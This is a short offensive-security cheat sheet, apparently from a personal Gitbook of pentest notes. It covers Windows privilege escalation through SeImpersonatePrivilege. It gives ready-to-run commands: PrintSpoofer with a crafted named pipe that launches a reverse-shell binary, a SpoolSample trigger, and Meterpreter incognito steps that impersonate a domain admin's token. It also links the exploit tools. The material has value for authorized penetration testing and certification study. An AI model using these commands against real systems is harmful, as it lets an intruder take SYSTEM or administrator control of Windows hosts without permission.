All Gitbook

Serivce Account Access Token

SeImpersonatePrivilege

LogoRoguePotato, PrintSpoofer, SharpEfsPotatoHackTricks

When no tokens related to other user accounts are available in memory, we can likely force the SYSTEM account to give us a token that we can impersonate. We can impersonate anyone who connects to our named pipe.

Default assigned:

  • built-in Network Service account

  • LocalService account

  • default IIS account

whoami /priv
cmd /c sc query spooler
LogoGitHub - itm4n/PrintSpoofer: Abusing Impersonation Privileges on Windows 10 and Server 2019GitHub
may need reflective load
https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/PrintSpoofer.NET/Program.cs
spoofsample
LogoGitHub - sailay1996/RpcSsImpersonator: Privilege Escalation Via RpcSs svcGitHub
works for Network service only
LogoGitHub - antonioCoco/RoguePotato: Another Windows Local Privilege Escalation from Service Account to SystemGitHub
LogoGitHub - antonioCoco/RogueWinRM: Windows Local Privilege Escalation from Service Account to SystemGitHub
works on Windows client only (not Server)
https://github.com/chvancooten/OSEP-Code-Snippets/tree/main/PrintSpoofer.NET
#hacked web ser locally create pipe & serve with rev shell.exe
.\PrintSpoofer.exe \\.\pipe\test\pipe\spoolss c:\temp\shell.exe

#callback to the loaclly created pipe triggering shell.exe call
.\SpoolSample.exe webself01 webself01/pipe/test

Meterpreter

impersonate any logged in users and obtain code execution in their context without access to any passwords or hashes (need SYSTEM shell, from above or below)

meterpreter >
getsystem
meterpreter >
load incognito
help incognito
list_tokens -u
impersonate_token corp1\\admin

getuid
PreviousLocal Administrator Password Solution (LAPS)NextMimikatz Abusing Kerberos

Last updated